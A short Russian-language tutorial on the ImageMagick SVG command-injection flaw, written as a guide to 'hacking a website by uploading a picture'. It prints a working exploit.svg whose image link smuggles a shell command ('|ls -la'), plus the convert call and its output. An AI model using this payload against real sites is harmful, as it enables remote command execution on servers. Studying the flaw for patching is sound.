Взлом с помощью фотографии. ImageMagick
Введение:
В этой статье мы увидим как возможно взломать веб-сайт лишь залив спроектированную картинку!
Все просто, ImageMagick — популярный пакет для обработки изображений имеет множество уязвимостей, хоть они и были устранены несколько лет назад, многие сайты до сих пор используют уязвимые версии!
Уязвимость позволяет нам выполнять свой собственный код на сервере сайта, что даст на доступ к командной строке.
Основное:
Создается специальная svg картинка, содержащая в себе специальный код. ImageMagick трактует код таким образом, что система исполняет указанную в коде команду.
Такой вид уязвимости является очень опасным, ведь может предоставить атакующему полный доступ.
Давайте создадим вредоносную картинку, назвав exploit.svg:
<?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg width="640px" height="480px" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink= "http://www.w3.org/1999/xlink"> <image xlink:href="https://example.com/image.jpg"|ls "-la" x="0" y="0" height="640px" width="480px"/> </svg>
convert exploit.svg out.png
То будет выполнена и команда ls -la:
$ convert exploit.svg out.png total 32 drwxr-xr-x 6 user group 204 drwxr-xr-x+ 232 user group 7888 ...
Вывод:
Уязвимость в ImageMagick является невероятно опасной как мы убедились в данной статье, хоть она и устранена на большинстве серверов. Подобные уязвимости делают веб-сайт легкой добычей для хакеров, а потому нужно всегда обновлять свои библиотеки до последних версий!
Внимание! Вся информация строго в ознакомительно-познавательных целях. Автор данной статьи, а также ресурс на котором он размещает данную статью, не несут ответственности за любые последствия от ее прочтения, а также за ваше плохое самочувствие, детей - двоечников и долги по ипотеке.